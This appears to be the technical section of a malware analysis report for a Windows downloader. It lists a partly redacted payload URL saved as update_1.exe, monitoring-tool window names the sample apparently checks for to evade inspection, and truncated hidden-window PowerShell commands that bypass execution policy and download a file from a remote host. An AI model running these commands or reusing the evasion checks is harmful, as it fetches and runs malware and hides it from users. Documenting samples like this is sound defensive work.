Technical Information
- http://te#######ryadmin.laundrypit.com/assets/fullcalendar/fullcalendar/x.d as %temp%\update_1.exe
- ClassName: '' WindowName: 'Task Manager'
- ClassName: '' WindowName: 'Windows Task-Manager'
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: '' WindowName: 'Resource Monitor'
- ClassName: '' WindowName: 'Process Hacker'
- ClassName: '' WindowName: 'Process Explorer'
- ClassName: '' WindowName: 'System Explorer'
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://te#######ryadmin.laundrypit.com...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://te#######ryadmin.laundrypit.com...